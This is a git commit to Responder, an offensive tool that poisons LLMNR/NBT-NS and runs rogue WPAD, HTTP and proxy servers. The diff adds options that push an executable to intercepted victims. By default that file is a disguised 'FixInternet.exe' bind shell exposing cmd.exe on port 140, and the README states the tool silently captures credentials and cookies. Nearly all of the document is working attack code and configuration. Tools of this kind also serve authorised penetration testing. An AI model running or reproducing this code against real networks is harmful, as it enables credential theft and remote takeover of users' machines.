Added: Ability to serve whatever kind of file via HTTP and WPAD There's now 3 new options.

2025-07-07 05:21:22 -07:00 · 2013-10-25 00:04:11 -04:00 · 2013-10-25 00:04:11 -04:00 · a8c29522db
commit a8c29522db
parent 9bfd8ade90
4 changed files with 118 additions and 7 deletions
--- a/CHANGELOG.txt
+++ b/CHANGELOG.txt
@ -1,4 +1,8 @@
 ChangeLog from 0.6 to 1.9:
+- Added: Bind shell which when executed on a victim workstation, will bind cmd.exe to port 140.
+- Added: -e, --exe, --file option for serving specific files via the HTTP and WPAD server.
+- Added: Ability to bind Responder to a specific interface
+- Fix: Several fixes
 - Added: HTTPS module.
 - Added: Support for LM Hash downgrade.
 - Added: WPAD transparent proxy server.
--- a/HTTPProxy.py
+++ b/HTTPProxy.py
@ -49,6 +49,49 @@ class WPADScript(Packet):
    def calculate(self):
        self.fields["ActualLen"] = len(str(self.fields["Payload"]))

+class ServerExeFile(Packet):
+    fields = OrderedDict([
+        ("Code",          "HTTP/1.1 200 OK\r\n"),
+        ("ContentType",   "Content-Type: application/octet-stream\r\n"),
+        ("LastModified",  "Last-Modified: Wed, 24 Nov 2010 00:39:06 GMT\r\n"),
+        ("AcceptRanges",  "Accept-Ranges: bytes\r\n"),
+        ("Server",        "Server: Microsoft-IIS/7.5\r\n"),
+        ("PoweredBy",     "X-Powered-By: ASP.NET\r\n"),
+        ("ContentLen",    "Content-Length: "),
+        ("ActualLen",     "76"), 
+        ("Date",          "\r\nDate: Thu, 24 Oct 2013 22:35:46 GMT\r\n"),
+        ("Connection",    "Connection: keep-alive\r\n"),
+        ("X-CCC",         "US\r\n"),
+        ("X-CID",         "2\r\n"),
+        ("CRLF",          "\r\n"),
+        ("Payload",       "jj"),
+    ])
+    def calculate(self):
+        self.fields["ActualLen"] = len(str(self.fields["Payload"]))
+
+class ServeAlwaysExeFile(Packet):
+    fields = OrderedDict([
+        ("Code",          "HTTP/1.1 200 OK\r\n"),
+        ("ContentType",   "Content-Type: application/octet-stream\r\n"),
+        ("LastModified",  "Last-Modified: Wed, 24 Nov 2010 00:39:06 GMT\r\n"),
+        ("AcceptRanges",  "Accept-Ranges: bytes\r\n"),
+        ("Server",        "Server: Microsoft-IIS/7.5\r\n"),
+        ("PoweredBy",     "X-Powered-By: ASP.NET\r\n"),
+        ("ContentDisp",   "Content-Disposition: attachment; filename="),
+        ("ContentDiFile", ""),
+        ("FileCRLF",      ";\r\n"),
+        ("ContentLen",    "Content-Length: "),
+        ("ActualLen",     "76"), 
+        ("Date",          "\r\nDate: Thu, 24 Oct 2013 22:35:46 GMT\r\n"),
+        ("Connection",    "Connection: keep-alive\r\n"),
+        ("X-CCC",         "US\r\n"),
+        ("X-CID",         "2\r\n"),
+        ("CRLF",          "\r\n"),
+        ("Payload",       "jj"),
+    ])
+    def calculate(self):
+        self.fields["ActualLen"] = len(str(self.fields["Payload"]))
+
 #HTTP Packet used for further NTLM auth.
 class IIS_Auth_407_Ans(Packet):
    fields = OrderedDict([
--- a/README.txt
+++ b/README.txt
@ -41,7 +41,7 @@ FEATURES
  supports NTLMv1, NTLMv2 hashes *and* Basic Authentication. This server
  was successfully tested on IE 6 to IE 10, Firefox, Chrome, Safari.
  Note: This module also works for WebDav NTLM authentication issued from
-  Windows WebDav clients (WebClient).
+  Windows WebDav clients (WebClient). You can now send your custom files to a victim.

 - Built-in HTTPS Auth server.
  In order to redirect HTTPS Authentication to this tool, you will need
@ -86,7 +86,7 @@ FEATURES

 - WPAD rogue transparent proxy server. This module will *silently* grab the encrypted
  credentials of anyone launching Internet Explorer on the network. It will also grab
-  the cookie of the requested page. This module is higly effective.
+  the cookie of the requested page. This module is higly effective. You can now send your custom files to a victim.

 CONSIDERATIONS
 ==============
@ -166,6 +166,19 @@ Options List:
 --lm=0                               Set this to 1 if you want to force LM hashing
                                     downgrade for Windows XP/2003 and earlier. Default value is False (0)

+-e 0                                 Set this option to 1 if you'd like to serve a specific
+                                     file via http & WPAD proxy server when  one of these
+                                     extensions are present in the url. Default value is
+                                     False (0)
+
+--exe=0                              Set this option to 1 if you'd like to always serve a
+                                     specific file via http & WPAD proxy server. It's best
+                                     to use this option with the --file option. Default
+                                     value is False (0)
+
+--file=backdoor.exe                  Serve a specific file when using -e option. Default is
+                                     FixInternet.exe (provided with Responder)
+

 For more information read these posts: 
 http://blog.spiderlabs.com/2012/10/introducing-responder-10.html
--- a/Responder.py
+++ b/Responder.py
@ -57,6 +57,12 @@ parser.add_option('-w','--wpad', action="store", dest="WPAD_On_Off", help = "Set

 parser.add_option('--lm',action="store", help="Set this to 1 if you want to force LM hashing downgrade for Windows XP/2003 and earlier. Default value is False (0)", metavar="0",dest="LM_On_Off", choices=['0','1'], default="0")

+parser.add_option('-e',action="store", help="Set this option to 1 if you'd like to serve a specific file via http & WPAD proxy server when  one of these extensions are present in the url. Default value is False (0)", metavar="0",dest="Exe_On_Off", choices=['0','1'], default="0")
+
+parser.add_option('--exe',action="store", help="Set this option to 1 if you'd like to always serve a specific file via http & WPAD proxy server. It's best to use this option with the --file option. Default value is False (0)", metavar="0",dest="Exec_Mode_On_Off", choices=['0','1'], default="0")
+
+parser.add_option('--file',action="store", help="Serve a specific file when using -e option. Default is FixInternet.exe (provided with Responder)", metavar="backdoor.exe",dest="FILENAME", default="FixInternet.exe")
+
 options, args = parser.parse_args()

 if options.OURIP is None:
@ -79,6 +85,9 @@ OURIP = options.OURIP
 BOUND_TO_IP = options.BOUND_TO_IP
 Basic = options.Basic
 On_Off = options.on_off.upper()
+Exe_On_Off = options.Exe_On_Off
+Exec_Mode_On_Off =options.Exec_Mode_On_Off
+FILENAME = options.FILENAME
 SSL_On_Off = options.SSL_On_Off.upper()
 SMB_On_Off = options.SMB_on_off.upper()
 SQL_On_Off = options.SQL_on_off.upper()
@ -122,7 +131,7 @@ Challenge = ""
 for i in range(0,len(NumChal),2):
    Challenge += NumChal[i:i+2].decode("hex")

-Show_Help("[+]NBT-NS & LLMNR responder started\nGlobal Parameters set:\nChallenge set is: %s\nWPAD Proxy Server is:%s\nHTTP Server is:%s\nHTTPS Server is:%s\nSMB Server is:%s\nSMB LM support is set to:%s\nSQL Server is:%s\nFTP Server is:%s\nDNS Server is:%s\nLDAP Server is:%s\nFingerPrint Module is:%s\n"%(NumChal,WPAD_On_Off,On_Off,SSL_On_Off,SMB_On_Off,LM_On_Off,SQL_On_Off,FTP_On_Off,DNS_On_Off,LDAP_On_Off,Finger_On_Off))
+Show_Help("[+]NBT-NS & LLMNR responder started\nGlobal Parameters set:\nChallenge set is: %s\nWPAD Proxy Server is:%s\nHTTP Server is:%s\nHTTPS Server is:%s\nSMB Server is:%s\nSMB LM support is set to:%s\nSQL Server is:%s\nFTP Server is:%s\nDNS Server is:%s\nLDAP Server is:%s\nFingerPrint Module is:%s\nServing Executable via HTTP&WPAD is:%s\nAlways serving executable via HTTP&WPAD is:%s\n\n"%(NumChal,WPAD_On_Off,On_Off,SSL_On_Off,SMB_On_Off,LM_On_Off,SQL_On_Off,FTP_On_Off,DNS_On_Off,LDAP_On_Off,Finger_On_Off,Exe_On_Off,Exec_Mode_On_Off))

 #Simple NBNS Services.
 W_REDIRECT   = "\x41\x41\x00"
@ -913,11 +922,44 @@ def Basic_Ntlm(Basic):
    if Basic == "0":
       return IIS_Auth_401_Ans()

+def ServeEXE(data,client, Filename):
+    Message = "[+]Exe file sent to: %s . Try telnet %s on port 140"%(client,client)
+    print Message
+    logging.warning(Message)
+    with open (Filename, "rb") as bk:
+       data = bk.read()
+       bk.close()
+       return data
+
+def ServeEXEOrNot(on_off):
+    if Exe_On_Off == "1":
+       return True
+    if Exe_On_Off == "0":
+       return False
+
+def ServeEXECAlwaysOrNot(on_off):
+    if Exec_Mode_On_Off == "1":
+       return True
+    if Exec_Mode_On_Off == "0":
+       return False
+
+Exec_Mode_On_Off
+
 #Handle HTTP packet sequence.
 def PacketSequence(data,client):
    a = re.findall('(?<=Authorization: NTLM )[^\\r]*', data)
    b = re.findall('(?<=Authorization: Basic )[^\\r]*', data)
    c = re.findall('(?<=wpad.dat )[^\\r]*', data)
+    if ServeEXEOrNot(Exe_On_Off) and re.findall('.exe', data):
+       payload = ServeEXE(data,client,FILENAME)
+       buffer1 = ServerExeFile(Payload = payload,filename=FILENAME)
+       buffer1.calculate()
+       return str(buffer1)
+    if ServeEXECAlwaysOrNot(Exec_Mode_On_Off):
+       payload = ServeEXE(data,client,FILENAME)
+       buffer1 = ServeAlwaysExeFile(Payload = payload,ContentDiFile=FILENAME)
+       buffer1.calculate()
+       return str(buffer1)
    if a:
       packetNtlm = b64decode(''.join(a))[8:9]
       if packetNtlm == "\x01":
@ -943,7 +985,6 @@ def PacketSequence(data,client):
       buffer1 = IIS_Auth_Granted()
       buffer1.calculate()
       return str(buffer1)
-
    if c:
       GrabCookie(data,client)
       buffer1 = IIS_Auth_Redir()
@ -970,7 +1011,7 @@ class HTTP(SocketServer.BaseRequestHandler):
                 self.request.send(buff)
              else:
                 buffer0 = PacketSequence(data,self.client_address[0])
-                 self.request.send(buffer0)
+                 self.request.sendall(buffer0)
        except Exception:
           pass#No need to be verbose..
           self.request.close()
@ -1035,6 +1076,16 @@ def ParseDomain(data,client):
 def ProxyPacketSequence(data,client):
    a = re.findall('(?<=Proxy-Authorization: NTLM )[^\\r]*', data)
    b = re.findall('(?<=Authorization: Basic )[^\\r]*', data)
+    if ServeEXEOrNot(Exe_On_Off) and re.findall('.exe', data):
+       payload = ServeEXE(data,client,FILENAME)
+       buffer1 = ServerExeFile(Payload = payload, filename=FILENAME)
+       buffer1.calculate()
+       return str(buffer1)
+    if ServeEXECAlwaysOrNot(Exec_Mode_On_Off):
+       payload = ServeEXE(data,client,FILENAME)
+       buffer1 = ServeAlwaysExeFile(Payload = payload,ContentDiFile=FILENAME)
+       buffer1.calculate()
+       return str(buffer1)
    if a:
       packetNtlm = b64decode(''.join(a))[8:9]
       if packetNtlm == "\x01":
@ -1075,7 +1126,7 @@ class HTTPProxy(SocketServer.BaseRequestHandler):
             data = self.request.recv(8092)
             ParseDomain(data,self.client_address[0])
             buffer0 = ProxyPacketSequence(data,self.client_address[0])      
-             self.request.send(buffer0)
+             self.request.sendall(buffer0)

        except Exception:
           pass#No need to be verbose..